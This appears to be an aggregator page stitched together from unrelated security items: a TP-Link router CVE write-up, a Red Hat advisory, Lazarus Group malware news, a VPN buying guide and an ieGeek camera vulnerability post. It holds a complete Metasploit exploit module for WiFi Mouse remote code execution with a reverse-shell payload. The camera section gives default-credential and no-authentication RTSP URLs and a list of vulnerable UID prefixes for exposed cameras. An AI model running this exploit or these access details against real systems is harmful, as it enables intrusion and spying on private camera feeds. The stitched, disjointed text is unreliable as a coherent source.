TP Link Archer AX10 V1 Firmware Version 1.3.1 Build 20220401 Rel. 57450(5553) was discovered to allow authenticated attackers to execute arbitrary code via a crafted backup file.

**TP-Link-Archer-AX10-V1**

A proof of concept for TP-LINK router Archer AX10 v1 - CVE-2022-40486

**Intro**

The device I conducted this research on was the Archer AX10 v1 home WiFi router from TP-Link (Firmware Version 1.3.1 Build 20220401 Rel. 57450(5553)).

My first approach was to get access via the UART Interface on the board.

You can see about "How to Detect Serial Pinout (GND, VCC, TX, RX)" in this link: https://youtu.be/zjafMP7EgEA?t=110

    RouterConverter
    TX	RX
    RX	TX
    GND	GND
    

Thanks, Flashback Team you guys are the inspiration for this PoC.

I was able to access the board using the USB Uart Cp2102 Interface. For this I used the following UART PINOUT:

After a successful connection, the next step was to detect the communication baud-rate, playing around with the baud-rates I found that the correct one was: 115200 using minicom.

Before connecting find out a port number of your ttl-usb converter, usually it is /dev/ttyUSB0. Start minicom and set up port connection.

minicom -s

Select Serial port setup. Then press A, input /dev/ttyUSB0. Press E set 115200 bps 8N1. After all save it Save setup as dfl.

Useful information was printed to UART Interface when the board is booting, but the most important was the Chip ID: ARM Cortex A7

After Device Boot I expected an unprotected system shell, but the device asked me for username and password:

So I was forced to change the research approach. I downloaded the original device firmware from the: https://static.tp-link.com/upload/firmware/2022/202205/20220511/Archer%20AX10(US)\_V1\_220401.zip

And with the help of Binwalk tool, I was able to extract the Router filesystem.

$ binwalk -e ax10v1-up-ver1-2-4-P1\[20211014-rel54860\]\_2021-10-14\_19.19.05.bin 

After some research, I realized that the same approach reported in CVE-2022-30075 works like a charm. It just took some adjusts to the xml file to make it work and get shell. All credits to Tomas Melicher aka aaronsvk.

**Timeline**

*   September 08, 2022 - Vulnerability identified
*   September 09, 2022 - Vulnerability reported

**LINKS**

*   https://www.tp-link.com/br/home-networking/wifi-router/archer-ax10/
*   https://www.tp-link.com/br/support/download/archer-ax10/v1/
*   https://github.com/aaronsvk/CVE-2022-30075
*   https://teknoraver.net/software/hacks/tplink/
*   https://medium.com/@LargeCardinal/decrypting-config-bin-files-for-tp-link-wr841n-wa855re-and-probably-more-676de396d724
*   https://gist.github.com/shreve/7a6413f087c15b233a69bb46edcfec17
*   https://github.com/ret5et/tplink\_backup\_decrypt\_2022.bin
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40486

CVE-2022-40486: TP-Link-Archer-AX10-V1/README.md at main · gscamelo/TP-Link-Archer-AX10-V1

On Realtek RTL8195AM devices before 284241d70308ff2519e40afd7b284ba892c730a3, the timer task can be locked when there are frequent and continuous Wi-Fi connection failures for the Soft AP mode.

CVE-2022-34326

Red Hat Security Advisory 2022-6714-01 - Updated images are now available for Red Hat Advanced Cluster Security for Kubernetes (RHACS). The updated image includes new features and bug fixes.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: RHACS 3.72 enhancement and security update  
Advisory ID:       RHSA-2022:6714-01  
Product:           RHACS  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6714  
Issue date:        2022-09-26  
CVE Names:         CVE-2015-20107 CVE-2022-0391 CVE-2022-1292   
                   CVE-2022-1586 CVE-2022-1785 CVE-2022-1897   
                   CVE-2022-1927 CVE-2022-2068 CVE-2022-2097   
                   CVE-2022-24675 CVE-2022-24921 CVE-2022-28327   
                   CVE-2022-29154 CVE-2022-29526 CVE-2022-30631   
                   CVE-2022-32206 CVE-2022-32208 CVE-2022-34903   
=====================================================================

1. Summary:

Updated images are now available for Red Hat Advanced Cluster Security for  
Kubernetes (RHACS). The updated image includes new features and bug fixes.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Release of RHACS 3.72 provides these changes:

New features  
* Automatic removal of nonactive clusters from RHACS: RHACS provides the  
ability to configure your system to automatically remove nonactive clusters  
from RHACS so that you can monitor active clusters only.  
* Support for unauthenticated email integration: RHACS now supports  
unauthenticated SMTP for email integrations. This is insecure and not  
recommended.  
* Support for Quay robot accounts: RHACS now supports use of robot accounts  
in quay.io integrations. You can create robot accounts in Quay that allow  
you to share credentials for use in multiple repositories.  
* Ability to view Dockerfile lines in images that introduced components  
with Common Vulnerabilities and Exposures (CVEs): In the Images view, under  
Image Findings, you can view individual lines in the Dockerfile that  
introduced the components that have been identified as containing CVEs.  
* Network graph improvements: RHACS 3.72 includes some improvements to the  
Network Graph user interface.

Known issue  
* RHACS shows the wrong severity when two severities exist for a single  
vulnerability in a single distribution. This issue occurs because RHACS  
scopes severities by namespace rather than component. There is no  
workaround. It is anticipated that an upcoming release will include a fix  
for this issue. (ROX-12527)

Bug fixes  
* Before this update, the steps to configure OpenShift Container Platform  
OAuth for more than one URI were missing. The documentation has been  
revised to include instructions for configuring OAuth in OpenShift  
Container Platform to use more than one URI. For more information, see  
Creating additional routes for the OpenShift Container Platform OAuth  
server. (ROX-11296)  
* Before this update, the autogenerated image integration, such as a Docker  
registry integration, for a cluster is not deleted when the cluster is  
removed from Central. This issue is fixed. (ROX-9398)  
* Before this update, the Image OS policy criteria did not support regular  
expressions, or regex. However, the documentation indicated that regular  
expressions were supported. This issue is fixed by adding support for  
regular expressions for the Image OS policy criteria. (ROX-12301)  
* Before this update, the syslog integration did not respect a configured  
TCP proxy. This is now fixed.  
* Before this update, the scanner-db pod failed to start when a resource  
quota was set for the stackrox namespace, because the init-db container in  
the pod did not have any resources assigned to it. The init-db container  
for ScannerDB now specifies resource requests and limits that match the db  
container. (ROX-12291)

Notable technical changes  
* Scanning support for Red Hat Enterprise Linux 9: RHEL 9 is now generally  
available (GA). RHACS 3.72 introduces support for analyzing images built  
with Red Hat Universal Base Image (UBI) 9 and Red Hat Enterprise Linux  
(RHEL) 9 RPMs for vulnerabilities.  
* Policy for CVEs with fixable CVSS of 6 or greater disabled by default:  
Beginning with this release, the Fixable CVSS >= 6 and Privileged policy is  
no longer enabled by default for new RHACS installations. The configuration  
of this policy is not changed when upgrading an existing system. A new  
policy Privileged Containers with Important and Critical Fixable CVEs,  
which gives an alert for containers running in privileged mode that have  
important or critical fixable vulnerabilities, has been added.

Security Fix(es)  
* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)  
* golang: regexp: stack exhaustion via a deeply nested expression  
(CVE-2022-24921)  
* golang: crypto/elliptic: panic caused by oversized scalar  
(CVE-2022-28327)  
* golang: syscall: faccessat checks wrong group (CVE-2022-29526)  
* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

To take advantage of the new features, bug fixes, and enhancements in RHACS  
3.72 you are advised to upgrade to RHACS 3.72.0.

4. Bugs fixed (https://bugzilla.redhat.com/):

2064857 - CVE-2022-24921 golang: regexp: stack exhaustion via a deeply nested expression  
2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode  
2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar  
2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

5. JIRA issues fixed (https://issues.jboss.org/):

ROX-12799 - Release RHACS 3.72.0

6. References:

https://access.redhat.com/security/cve/CVE-2015-20107  
https://access.redhat.com/security/cve/CVE-2022-0391  
https://access.redhat.com/security/cve/CVE-2022-1292  
https://access.redhat.com/security/cve/CVE-2022-1586  
https://access.redhat.com/security/cve/CVE-2022-1785  
https://access.redhat.com/security/cve/CVE-2022-1897  
https://access.redhat.com/security/cve/CVE-2022-1927  
https://access.redhat.com/security/cve/CVE-2022-2068  
https://access.redhat.com/security/cve/CVE-2022-2097  
https://access.redhat.com/security/cve/CVE-2022-24675  
https://access.redhat.com/security/cve/CVE-2022-24921  
https://access.redhat.com/security/cve/CVE-2022-28327  
https://access.redhat.com/security/cve/CVE-2022-29154  
https://access.redhat.com/security/cve/CVE-2022-29526  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/cve/CVE-2022-32206  
https://access.redhat.com/security/cve/CVE-2022-32208  
https://access.redhat.com/security/cve/CVE-2022-34903  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/acs/3.72/release_notes/372-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0ItzjgjWX9erEAQg2Yg//fDLYNktH9vd06FrD5L77TeiYnD/Zx+f5  
fk12roODKMOpcV6BmnOyPG0a6POCmhHn1Dn6bOT+7Awx0b9A9cXXDk6jytkpDhh7  
O0OxzWZVVvSzNe1TL3WN9vwZqSpAYON8euLBEb16E8pmEv7vXKll3wMQIlctp6Nr  
ey6DLL718z8ghXbtkkcGsBQqElM4jESvGm5xByMymfRFktvy9LSgTi+Zc7FY7gXL  
AHitJZiSm57D/pwUHvNltLLkxQfVAGuJXaTHYFyeIi6Z2pdDySYAXcr60mVd6eSh  
9/7qGwdsQARwmr174s0xMWRcns6UDvwIWifiXl6FUnTZFlia+lC3xIP1o2CXwoFP  
Fr7LpF0L9h5BapjSRv1w6qkkJIyJhw5v9VmZQoQ3joZqRQi0I6qLOcp92eik63pM  
i11ppoeDNwjpSST40Ema3j9PflzxXB7PKBUfKWwqNc2dnWDkiEhNaXOAZ7MqgdLo  
MB3enlKV4deeWOb5OA1Vlv/lAAJM0h5AOgTIBddYs3CDsyoK9fKm1UF/BEhcWMyr  
kV3AJ0/zzAK6ev4hQmP8Ug4SbdiHNdM3X1vgH54OVJ3Al3E1nAEyYmELNUITrvXV  
jJI5thbVwK78vOX9yWcmpZm879BnHnUPzGbS0lF5FVJOSZ8E7LvOE7lCM/dg094z  
0riGwT9O9Ys=  
=hArw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6714-01

The infamous Lazarus Group has continued its pattern of leveraging unsolicited job opportunities to deploy malware targeting Apple's macOS operating system.
In the latest variant of the campaign observed by cybersecurity company SentinelOne last week, decoy documents advertising positions for the Singapore-based cryptocurrency exchange firm Crypto.com.
The latest disclosure builds on previous

The infamous Lazarus Group has continued its pattern of leveraging unsolicited job opportunities to deploy malware targeting Apple's macOS operating system.

In the latest variant of the campaign observed by cybersecurity company SentinelOne last week, decoy documents advertising positions for the Singapore-based cryptocurrency exchange firm Crypto.com.

The latest disclosure builds on previous findings from Slovak cybersecurity firm ESET in August, which delved into a similar phony job posting for the Coinbase cryptocurrency exchange platform.

Both these fake job advertisements are just the latest in a series of attacks dubbed Operation In(ter)ception, which, in turn, is a constituent of a broader campaign tracked under the name Operation Dream Job.

Although the exact distribution vector for the malware remains unknown, it's suspected that potential targets are singled out via direct messages on the business networking site LinkedIn.

The intrusions commence with the deployment of a Mach-O binary, a dropper that launches the decoy PDF document containing the job listings at Crypto.com, while, in the background, it deletes the Terminal's saved state ("com.apple.Terminal.savedState").

The downloader, also similar to the safarifontagent library employed in the Coinbase attack chain, subsequently acts as a conduit for a bare-bones second-stage bundle named "WifiAnalyticsServ.app," which is a copycat version of "FinderFontsUpdater.app."

"The main purpose of the second-stage is to extract and execute the third-stage binary, wifianalyticsagent," SentinelOne researchers Dinesh Devadoss and Phil Stokes said. "This functions as a downloader from a \[command-and-control\] server."

The final payload delivered to the compromised machine is unknown owing to the fact that the C2 server responsible for hosting the malware is currently offline.

These attacks are not isolated, for the Lazarus Group has a history of carrying out cyber-assaults on blockchain and cryptocurrency platforms as a sanctions-evading mechanism, enabling the adversaries to gain unauthorized access to enterprise networks and steal digital funds.

"The threat actors have made no effort to encrypt or obfuscate any of the binaries, possibly indicating short-term campaigns and/or little fear of detection by their targets," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

North Korea's Lazarus Hackers Targeting macOS Users Interested in Crypto Jobs

The WiFi Mouse (Mouse Server) from Necta LLC contains an authentication bypass as the authentication is completely implemented entirely on the client side. By utilizing this vulnerability, is possible to open a program on the server (cmd.exe in our case) and type commands that will be executed as the user running WiFi Mouse (Mouse Server), resulting in remote code execution. Tested against versions 1.8.3.4 (current as of module writing) and 1.8.2.3.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  include Exploit::Remote::Tcp  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Wifi Mouse RCE',        'Description' => %q{          The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the          authentication is completely implemented entirely on the client side. By utilizing          this vulnerability, is possible to open a program on the server          (cmd.exe in our case) and type commands that will be executed as the user running          WiFi Mouse (Mouse Server), resulting in remote code execution.          Tested against versions 1.8.3.4 (current as of module writing) and          1.8.2.3.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'REDHATAUGUST', # edb          'H4RK3NZ0' # edb, original discovery        ],        'References' => [          [ 'EDB', '50972' ],          [ 'EDB', '49601' ],          [ 'CVE', '2022-3218' ],          [ 'URL', 'http://wifimouse.necta.us/' ],          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/wifi%20mouse/wifi-mouse-server-rce.py' ]        ],        'Arch' => [ ARCH_X64, ARCH_X86 ],        'Platform' => 'win',        'Targets' => [          [            'stager',            {              'CmdStagerFlavor' => ['psh_invokewebrequest', 'certutil']            }          ],        ],        'Payload' => {          'BadChars' => "\x0a\x00"        },        'DefaultOptions' => {          # since this may get typed out ON SCREEN we want as small a payload as possible          'PAYLOAD' => 'windows/shell/reverse_tcp'        },        'DisclosureDate' => '2021-02-25',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [CRASH_SERVICE_DOWN],          'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # typing on screen        }      )    )    register_options(      [        OptPort.new('RPORT', [true, 'Port WiFi Mouse Mouse Server runs on', 1978]),        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),        OptInt.new('LINEMAX', [true, 'Maximum length of lines to send for stager method.  Smaller for more unstable connections.', 1_020]),      ]    )  end  def send_return    sock.put('key  3RTN') # what the mobile app sends  end  def send_command(command)    sock.put("utf8 #{command}\x0A")    sleep(datastore['SLEEP'])    send_return  end  def open_file(file)    file = "/#{file}".gsub('\\', '/').gsub(':', '')    sock.put("openfile #{file}\x0A")  end  def exploit    connect    print_status('Opening command prompt')    open_file('C:\\Windows\\System32\\cmd.exe')    sleep(datastore['SLEEP']) # give time for it to open    print_status('Typing out payload')    execute_cmdstager({ linemax: datastore['LINEMAX'], delay: datastore['SLEEP'] })    handler  end  def execute_command(cmd, _opts = {})    send_command(cmd)  endend

WiFi Mouse 1.8.3.4 Remote Code Execution

An HTTP response splitting attack in web application in ASUS RT-AX88U before v3.0.0.4.388.20558 allows an attacker to craft a specific URL that if an authenticated victim visits it, the URL will give access to the cloud storage of the attacker.

**Vulnerability type**

HTTP Response splitting (CVE-2021-41437)

**Vendor**

ASUS

**Affected product**

RT-AX88U

**Attack type**

Remote

**Affected components**

The AiCloud component of the current web app is vulnerable to an HTTP response splitting attack.

**Attack vector**

An attacker can craft a specific URL that if an authenticated victim visits it, the URL will give access to the cloud storage of the attacker.

**Patch**

Fixed from firmware v3.0.0.4.388.20558 (https://www.asus.com/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AX88U/HelpDesk\_BIOS/)

CVE-2021-41437: easy-exploits/Web/ASUS/CVE-2021-41437 at main · efchatz/easy-exploits

It won’t solve all of your privacy problems, but a virtual private network can make you a less tempting target for hackers.

A virtual private network (VPN) is like a protective tunnel you can use to pass through a public network, protecting your data from outside eyes. Whether you're worried about hiding your browsing activity from your internet service provider so it doesn't sell your data to advertisers, or you want to stay safe on a public Wi-Fi hot spot to keep nearby digital snoops from capturing your passwords, a VPN can help protect you.

However, while a VPN will keep you safe at your local coffee shop, it comes with a cost. Using a VPN means your VPN provider will know everything about your browsing habits. This makes VPN providers a target for hackers. Be sure you even need one before you read on.

Picking the right VPN service is serious business. Most VPN providers say they keep no logs of their users' activity, but this is rarely verified. You're stuck taking companies at their word. For this reason, we've limited our testing to VPN providers that have been independently audited by security firms and have published the results.

To help you sort out when and why you might want a VPN, as well as why you might not, be sure to read through our complete guide to VPNs below. If you're sure you want to use a VPN, here are our top picks among commercial VPN providers.

_Updated September 2022: We've included some updated speed test results, included some new features from Surfshark, and noted our experiences paying for Mullvad with bitcoin._

_Special offer for Gear readers: Get a_ _**1-year subscription to**_ **WIRED** _**for $5 ($25 off)**__. This includes unlimited access to_ WIRED._com and our print magazine (if you'd like). Subscriptions help fund the work we do every day._

> If you buy something using links in our stories, we may earn a commission. This helps support our journalism. Learn more.

Best for Most People

**Surfshark VPN**

Surfshark wouldn't be my top pick if my life depended on my VPN, but for most of us that's not the case. If you just want a way to get around some geographical restrictions on content (aka access Netflix) and protect your traffic while using an open Wi-Fi hot spot, Surfshark is a good choice. It's secure, and it provides a great value for the money if you pay for two years up front.

Surfshark offers a kill switch that automatically stops your traffic if your VPN connection fails, and it supports multihop VPN connects, which means your traffic goes from your machine to a VPN server to another VPN server, and then to the destination server. This provides an extra layer of protection should the VPN itself be compromised, though there is a corresponding speed hit when using a multihop connection. The company also recently added support for manual Wireguard configuration. Most people will be fine sticking with Surfshark's apps, but if you're trying to connect your entire network to Surfshark directly through a router, the manual configuration will be welcome news.

In my testing over the years, Surfshark has consistently had some of the best speeds of any VPN I've used. Yes, it is slower than not using a VPN, but I have never had any problem streaming HD content through Surfshark. It's fast enough that in most cases you won't notice any speed degradation at all.

Surfshark is based in the British Virgin Islands, which, although technically a territory of Great Britain, is generally considered a safe haven and has no data-retention laws. What I don't like is that Surfshark is legally untested. The company has a zero-log policy, and you can (and should) opt out of the diagnostic crash reports in the app. Still, you're taking Surfshark at its word when it says it won't keep logs of your internet activity. Encouragingly, the company's browser extensions have undergone an independent security audit that didn't turn up any significant problems. 

Surfshark recently merged with NordVPN. So far we have not noticed any changes for its customers, but we will be keeping an eye on it going forward.

**Surfshark costs $2.50 per month if you buy two years up front, $4 per month if you buy one year up front.**

Best for Advanced Users

**Mullvad VPN**

Mullvad is based in Sweden and first came to my attention because of its early support for WireGuard, a faster protocol for tunneling VPN traffic.

Another thing I like is Mullvad's system for accepting cash payments. If you prefer to remain totally anonymous, you can generate a random account number, write that number down on a slip of paper, and mail it, along with cash, to Sweden. In theory, no one will be able to connect you to that account. (The truly paranoid will don a tinfoil hat, wear gloves, print from a public printer, and mail from a remote mailbox.) I have not tested the cash option, but I did recently extend my Mullvad subscription using bitcoin and it worked without a hitch.

Part of what I like about Mullvad is its down-to-earth approach that doesn't overhype with its marketing and helps users take additional steps to protect their privacy. For example, the company has an entire page showing you how to disable WebRTC in your web browser. As long as WebRTC is enabled (and it is by default in most browsers), websites can view your actual IP address even when you use a VPN.

Mullvad offers apps for every major platform, as well as routers. The applications are all open source, and you can check the code yourself on GitHub. The service has been independently audited as well. Advanced users can download configuration files and use them directly with OpenVPN or Wireguard.

In my testing, speeds were very good. I never encountered a situation where I couldn't get a fast connection. Over the years Mullvad has become the VPN I rely on day-to-day.

**Mullvad VPN costs 5 euros (around $6) per month, cash or charge.**

Best for VPN Newcomers

**TunnelBear VPN**

Choosing a VPN can be overwhelming. If you're tired of security mumbo jumbo and lock icons, TunnelBear might be the VPN for you. Its cute bear animations help demystify what VPNs do, how they work, and what they can offer you. Sometimes the easiest way to make technology more approachable is to put a friendly face on it.

Don't worry though, TunnelBear isn't all cute bear animations. It has the same security features as other VPN providers, like a no-logging policy and a clear privacy policy, and it's been independently audited.

In my testing, speeds with TunnelBear were competitive with the other options listed here. One of my favorite parts of TunnelBear is the free trial option, which makes it easy to test-drive it and see what your speeds are like without committing. TunnelBear has fewer geographic server locations than some of our other options, but unless you're traveling abroad or need to get around a specific geo-restriction, that shouldn't matter for most users.

**TunnelBear costs $3.33 per month if you buy one year up front****.**

Best for Circumventing Geographic Restrictions

**NordVPN**

NordVPN is one of the most popular VPNs around, thanks to a wide selection of servers and reasonable prices. It's also one of the most reliable ways I've found to circumvent location-based restrictions. I used it extensively while living in Mexico to get around Netflix's geographic restrictions. That said, this is a cat-and-mouse game; Netflix is always updating its server ban list, so NordVPN might not work in the future.

NordVPN is based out of Panama, which is not part of the Five Eyes, Nine Eyes, or 14 Eyes jurisdictions. That doesn't mean your government can't spy on you, but it does at least mean it will have to put in some extra legwork to do it (yes, that's about where we are these days). NordVPN has been audited a number of times, most recently in June of last year, when third-party auditor VerSprite found nothing amiss. As noted above, NordVPN and Surfshark recently announced a merger. Both will continue to operate as separate entities, but they are now a single company.

NordVPN also recently added a new service dubbed Threat Protection, which will block web-based trackers, phishing attempts, some ads, and malicious websites. I have not tested it extensively, and I personally rely on browser-based plug-ins to block threats like this. But if you're looking for an all-in-one solution, this might work.

I've never had an issue with speed using NordVPN, and the user interface of its apps is dead simple. Just click the country you want to use and the app will take care of connecting and configuring everything for you. If you want manual control, you can connect by using NordVPN's configuration files.

**NordVPN costs $5 per month if you buy one year up front. It also has frequent sales on a two-year deal that works out to about $3 a month.**

Best for High-Risk Use Cases

**Tor**

If you're in a situation where personal security is of the utmost importance, do not rely on a VPN. Use Tor (ideally through Tails) instead.

Using the Tor network accomplishes some of the same things as a VPN, but it's a little bit different. Tor provides anonymity, meaning no one can figure out who you are, but not necessarily privacy. People still might be able to see what you're doing, they just won't know it's you doing it. (VPNs provide privacy because no one can see what you're doing while you're going out of a VPN tunnel, but you don't have anonymity because the VPN provider knows who you are.)

Tor is simple to set up. All you need to do is download the Tor browser, and it will connect you to the web. Once you're connected to the Tor network, you can browse the web as you normally would. Except everything will be slower. When using Tor, your request for a website hops around the Tor network, bouncing between servers, before emerging and connecting to the actual site you want to visit. This makes Tor slow, sometimes incredibly slow, but that's necessary to protect your anonymity. And yes, you can combine a VPN with Tor, though that's somewhat beyond the scope of this guide.

How We Picked

VPN providers like to claim they keep no logs, which means they know nothing about what you do using their services. There are a variety of reasons to be skeptical about this claim, namely because they have to have a user ID of some kind tied to a payment method, which means the potential exists to link your credit card number (and thus your identity) to your browsing activity.

For that reason, I mainly limited my testing to providers that have been subpoenaed for user data in the US or Europe and failed to produce the logs or have at least undergone a third-party security audit. While these criteria can't guarantee the providers aren't saving log data, this method of selection gives us a starting point for filtering through the hundreds of VPN providers. Unfortunately other factors also come into play, VPNs that once made our list—Like ExpressVPN—are sometimes sold to less reputable companies. In cases like ExpressVPN I chose to remove it mainly because I have no way to know if it remains trustworthy or not.

Using these criteria, I narrowed the field to the most popular, reputable VPN providers and began testing them over a variety of networks (4G, cable, FiOS, and plenty of painfully slow coffee shop networks) over the past nine months. I tested network speed and ease of use (how you connect), and I also considered available payment methods, how often connections dropped, and any slowdowns I encountered.

Why You Might Not Need a VPN

It's important to understand not just what a VPN can do, but also what it can't do. As noted above, VPNs act like a protective tunnel. A VPN shields you from people trying to snoop on your traffic while it's in transit between your computer and the website you're browsing or the service you're using.

Public networks that anyone can join—even if they have to use a password to connect—are easy hunting grounds for attackers who want to see your network data. If your data is being sent unencrypted—like if the website you're connecting to doesn't use the secure HTTPS method—the amount of information an attacker can gather from you can be disastrous. Web browsers make it easy to tell when your connection is secure. Just look for a green lock icon at the top of your screen next to the web address. These days, most websites connect using HTTPS, so you're probably fine. But if that green lock icon isn't there, as it sometimes isn't on school, library, and small business websites, anyone can view whatever data you're sending. Unless you're using a VPN, which hides all of your activity, even on unencrypted websites.

Just connecting to a VPN isn't enough. Be sure to check out our guide to using a VPN to make sure you have everything set up correctly.

A VPN also changes your IP address, which adds an additional layer of protection. By giving you a different IP address, a VPN can make it appear as though you're in a different physical location. So even if you're sitting in California, the website you're accessing will think you're in Canada, Hungary, Uruguay, or Thailand. Unfortunately, this method of obscuring your location is not airtight. Technology built into web browsers that's known as WebRTC can leak your true IP address even when you're using a VPN. If this is a concern, disable WebRTC in your browser before connecting to a VPN. Mullvad has instructions on how to disable WebRTC in most browsers.

It's debatable how much masking your IP address really helps protect your privacy in the first place. Your IP address is only one of many, many bits of data websites collect about you. If privacy is your concern, you're better off using web browsers (and extensions) that offer additional tools to protect your privacy. Mozilla Firefox has several of these tools available. Or if you want to get serious about it, use the ultra-private Tor browser as noted above.

To add to the confusion around VPNs, providers—even some I've recommended here, unfortunately—often engage in misleading marketing. Nearly every VPN service website I visited had some kind of red banner claiming I was “not protected,” even when I was using a VPN at the time. The problem is that I wasn't using _their_ VPN. More honest VPN providers, like Mullvad, tell you what's actually happening: “You're not protected _by Mullvad_.” Kudos to Mullvad for not using fear to sell subscriptions.

Either way, the important thing to remember is that using a VPN does not make you anonymous. While VPNs may not be able to do much to protect your privacy, they are an essential tool when it comes to protecting you from snoops trying to gather your unencrypted data sent over insecure networks.

The Best VPNs to Protect Yourself Online

ieGeek IG20 hipcam RealServer V1.0 is vulnerable to Incorrect Access Control. The algorithm used to generate device IDs (UIDs) for devices that utilize Shenzhen Yunni Technology iLnkP2P suffers from a predictability flaw that allows remote attackers to establish direct connections to arbitrary devices.

*   ieGeek IG20 Issues/Vulnerabilities
    *   UID Weakness CWE-340
    *   Unauthenticated / Default auth access to camera stream via RTSP protocol CWE-284
*   Default P2P Camera feed activated and sent to a server in plaintext CWE-284
    *   Access to files stored on the camera CWE-284
*   Admin Panel – Basic Authentication in use / Weak Password Requirements CWE-521 / CWE-287
*   JavaScript injection (DOM-based) CWE-79
*   HTTP Response Header Injection/Splitting CWE-644
*   Device NMAP scan
*   The Listing On Amazon
*   Update 01 Sep 2022 – Product Still Listed On Amazon
*   Update: 01 Sep 2022
*   Consumer Recommendations
*   Q&A
    *   Are ieGeek cameras secure?
    *   What are the real risks of ieGeek cameras?
*   Cheap CCTV Invites Outside Threats Into Your Home\[4\]
*   References
    *   Please login to bookmark
    *   Don’t miss:

**_Amazon’s “highly rated” ieGeek brand continues to present a number of security vulnerabilities._**

On the 19th of Aug 2022 I set out to purchase a CCTV Camera from Amazon, I read over the reviews of the ieGeek IG20, and it seemed great, the value too. For just £29.99 I’d get myself a great looking CCTV Camera, packed full of features. It has night vision, Smartphone access, Motion Detection, Plug & Play, It’s waterproof and it can connect via WiFi or Ethernet. Great, I was sold. However, I failed to do any research on the brand specifically.

The camera arrived the following day, and later that day I got around to setting it up. I first noticed that on the back of the camera, there was a sticker with a UID printed, along with a Factory default Username & Password combination, consisting of admin/admin.

**UID Weakness CWE-340**

The UID appears to be predictable.The UID in our case, will look like this: **_AAFF-123456-ABCDE_** – depending on the make and model.

*   **UID p1**: _Same 4 letters at the start._
*   **UID p2:** _6 numbers at random in the middle._
*   **UID p3**: _5 random letters at the end._

Evidently, having just this basic knowledge of the UID and using the default credentials, the camera feed could be accessed using the software provided by ieGeek from their website by testing each UID value. This can leave a number of IP cameras vulnerable to unauthorised viewing with the privacy of users at risk.

Below are some more vulnerable prefixes running the same crappy firmware.

AAAA

AABB

AACC

AAES

AIPC

AAFF

BBBB

CAM

CAMERA

CCCC

DDDD

DEAA

EEEE

ELSA

ELSO

ESCM

ESN

ESS

EUA

EYE

FCARE

FDTAA

FFFF

FOUS

GCAM

GCMN

GGGG

GKW

HHHH

HRXJ

HSL

HVC

HWAA

HZD

HZDA

HZDB

HZDC

HZDN

HZDX

HZDY

HZDZ

IIII

ISRP

JWEV

MCI

MDI

MEIA

MMMM

MSE

MSI

MTE

NIP

NNNN

NTP

OBJ

PHP

PISR

POLI

PPCN

PPPP

PTP

QSHV

ROSS

SECRUI

SPCN

SSAA

SSSS

SURE

SXH

TTTT

UUUU

VIEW

VSTA

VSTB

VSTC

VSTD

VSTF

WCAM

WGKJ

WHI

WNR

WNS

WNV

WWWW

WXH

WXO

XCPTP

XHA

XLT

XWL

ZLD

ZZZZ

AVA

**Unauthenticated / Default auth access to camera stream via RTSP protocol CWE-284**

By default, one can easily access the camera’s stream externally or internally depending on your router/network configuration, with our without means of Authentication.

*   **Zero Authentication:** rtsp://+IP+/11
*   **Default Auth:** rtsp://admin:\[email protected\]+IP+/11

_**Replace +IP+ with your local or external IP**_.

Here is a screenshot of the Default RTSP settings, requiring Zero authentication.

**Default P2P Camera feed activated and sent to a server in plaintext CWE-284**

The cloud function of the camera uses the P2P protocol to send and make requests back to a server based in China in plaintext. It was found that all connections back to this were made in plaintext regardless of protocol, this includes the viewing of the camera’s stream and control. HTTPS was not found to be implemented anywhere on the camera.

**Access to files stored on the camera CWE-284**

The following directories can be viewed using the default login:

*   http://+IP+/tmpfs
*   http://+IP+/js
*   http://+IP+/lib
*   http://+IP+/log
*   http://+IP+/resources
*   http://+IP+/sd
*   http://+IP+/swfs

The number of links discovered showed that the SD card, log files and website front-end code were accessible from the web interface. This includes any footage that has been recorded by the device and stored on the external SD card.

I decided to check out shodan.io and searched for “hipcam realserver”. Shodan is a Google like database of Connected Devices, if you like. It produced 93,312 results of addresses that had port 554 exposed to the internet. As I browsed these I also discovered a number of addresses that also had Port 80 exposed, hosting the same ‘IP Camera’ front page with login. With what I have discovered it is possible for each of these devices to be accessed via default credentials, or if the admin credentials are changed, Using VLC player, I could potentially connect to each of these camera streams without the need to authenticate.

**Admin Panel – Basic Authentication in use / Weak Password Requirements CWE-521 / CWE-287**

